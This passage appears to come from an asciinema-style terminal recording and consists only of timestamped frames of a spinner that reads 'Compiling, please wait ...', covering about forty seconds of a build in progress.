[40.855941, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[40.956349, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[41.056764, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[41.157262, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[41.257569, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[41.357946, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[41.458384, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[41.558745, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[41.659156, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[41.759558, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[41.859978, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[41.960382, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[42.060792, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[42.161148, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[42.261538, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[42.361894, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[42.462312, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[42.562715, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[42.6631, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[42.763523, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[42.863937, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[42.964332, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[43.064767, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[43.165276, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[43.265675, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[43.366059, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[43.466459, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[43.566861, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[43.667263, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[43.767686, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[43.868081, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[43.968513, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[44.068939, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[44.16934, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[44.26973, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[44.37016, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[44.470572, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[44.57097, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[44.671395, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[44.771854, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[44.872212, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[44.972622, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[45.073035, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[45.173427, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[45.273831, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[45.374248, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[45.474648, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[45.575015, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[45.67536, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[45.775784, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[45.876195, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[45.976581, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[46.076994, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[46.177417, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[46.277828, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[46.378259, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[46.478643, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[46.579062, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[46.679483, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[46.779936, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[46.880336, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[46.980748, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[47.081175, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[47.181583, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[47.281996, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[47.382417, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[47.482822, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[47.583236, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[47.683666, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[47.784081, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[47.884434, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[47.984844, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[48.085173, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[48.185572, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[48.285954, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[48.3864, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[48.486722, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[48.587155, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[48.687533, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[48.787934, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[48.888325, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[48.988634, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[49.088989, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[49.189391, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[49.289774, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[49.390179, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[49.490966, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[49.591386, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[49.69197, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[49.792603, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[49.892892, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[49.993266, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[50.093741, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[50.194145, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[50.294524, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[50.394942, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[50.495352, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[50.595733, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[50.69614, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[50.796532, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[50.896893, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[50.997281, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[51.097628, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[51.198063, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[51.298421, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[51.398825, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[51.499873, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[51.60024, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[51.70058, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[51.800993, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[51.901384, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[52.001699, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[52.102069, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[52.202468, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[52.302861, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[52.403232, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[52.503626, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[52.604076, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[52.704477, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[52.805056, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[52.905444, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[53.005825, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[53.110452, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[53.210782, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[53.31116, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[53.411619, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[53.511944, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[53.614903, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[53.715292, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[53.815668, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[53.916192, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[54.016484, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[54.116879, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[54.217176, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[54.317617, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[54.418009, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[54.518418, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[54.618773, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[54.719184, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[54.819582, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[54.920023, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[55.020375, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[55.120785, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[55.221135, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[55.321574, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[55.421999, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[55.52238, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[55.622783, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[55.723193, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[55.823583, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[55.923971, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[56.024373, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[56.124755, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[56.225162, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[56.325365, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[56.425772, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[56.525886, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[56.626309, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[56.726669, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[56.827049, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[56.927429, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[57.027905, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[57.128276, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[57.228688, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[57.329093, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[57.429516, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[57.529944, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[57.63033, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[57.730737, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[57.831133, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[57.931619, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[58.032057, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[58.132469, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[58.232894, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[58.333275, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[58.433705, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[58.534168, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[58.634575, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[58.73499, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[58.835397, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[58.935794, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[59.036204, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[59.136617, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[59.237047, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[59.33746, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[59.437901, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[59.538298, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[59.638727, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[59.739109, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[59.839635, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[59.94026, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[60.040642, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[60.141447, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[60.241387, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[60.341918, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[60.442328, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[60.542746, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[60.643135, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[60.743526, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[60.84396, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[60.944316, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[61.04472, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[61.145098, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[61.245508, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[61.346228, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[61.446459, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[61.547139, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[61.647556, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[61.74798, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[61.848361, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[61.949064, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[62.049482, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[62.150429, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[62.250865, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[62.351309, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[62.45173, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[62.552125, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[62.652518, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[62.752816, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[62.853137, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[62.953469, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[63.053885, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[63.154313, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[63.254721, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[63.355117, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[63.45552, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[63.555964, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[63.656345, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[63.756771, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[63.857192, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[63.957616, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[64.058059, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[64.158465, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[64.258865, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[64.359278, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[64.45967, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[64.560073, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[64.660496, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[64.760907, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[64.861226, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[64.961635, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[65.062101, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[65.162473, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[65.262813, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[65.363215, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[65.463584, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[65.563929, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[65.664267, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[65.764654, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[65.865038, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[65.965715, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[66.06613, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[66.16656, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[66.266957, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[66.367352, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[66.467776, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[66.56818, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[66.668547, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[66.768962, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[66.869373, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[66.969801, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[67.070183, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[67.170579, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[67.270976, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[67.371375, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[67.471786, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[67.572066, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[67.672406, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[67.772782, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[67.873183, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[67.973581, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[68.074007, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[68.17439, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[68.274791, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[68.375213, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[68.475663, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[68.576092, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[68.67649, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[68.77689, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[68.877298, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[68.977677, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[69.078048, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[69.178464, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[69.278878, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[69.37929, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[69.479712, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[69.580398, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[69.680635, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[69.781205, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[69.881588, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[69.981997, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[70.082411, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[70.182791, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[70.283226, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[70.383633, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[70.484052, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[70.585646, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[70.6861, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[70.786501, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[70.886885, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[70.988026, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[71.088754, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[71.189307, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[71.289785, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[71.390319, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[71.490765, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[71.591187, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[71.691638, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[71.792094, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[71.892535, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[71.992966, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[72.093408, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[72.193777, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[72.294164, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[72.394695, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[72.495136, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[72.595574, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[72.69601, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[72.796464, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[72.896877, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[72.997174, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[73.097672, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[73.198063, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[73.298468, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[73.39889, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[73.499343, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[73.599774, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[73.7002, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[73.800607, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[73.901027, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[74.001645, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[74.102027, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[74.202413, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[74.302779, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[74.40323, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[74.503582, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[74.604029, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[74.704466, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[74.804863, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[74.905147, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[75.00553, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[75.106244, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[75.206674, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[75.307059, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[75.407502, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[75.507792, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[75.608195, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[75.708634, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[75.809089, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[75.909504, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[76.009917, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[76.110303, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[76.21069, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[76.31108, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[76.411364, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[76.511775, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[76.612203, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[76.712609, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[76.812969, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[76.913387, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[77.014031, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[77.114428, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[77.21484, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[77.315352, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[77.415754, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[77.516177, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[77.617047, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[77.717476, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[77.817868, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[77.91827, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[78.018659, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[78.119074, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[78.219374, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[78.319747, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[78.420109, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[78.520511, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[78.620928, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[78.721328, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[78.821732, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[78.922079, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[79.022451, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[79.122864, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[79.223257, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[79.323648, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[79.424062, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[79.524561, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[79.624847, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[79.725183, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[79.825596, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[79.925954, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[80.026329, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[80.126713, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[80.227116, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[80.327518, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[80.427925, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[80.528328, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[80.628736, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[80.729183, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[80.829605, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[80.929934, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[81.030613, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[81.131023, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[81.231438, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[81.331889, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[81.432257, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
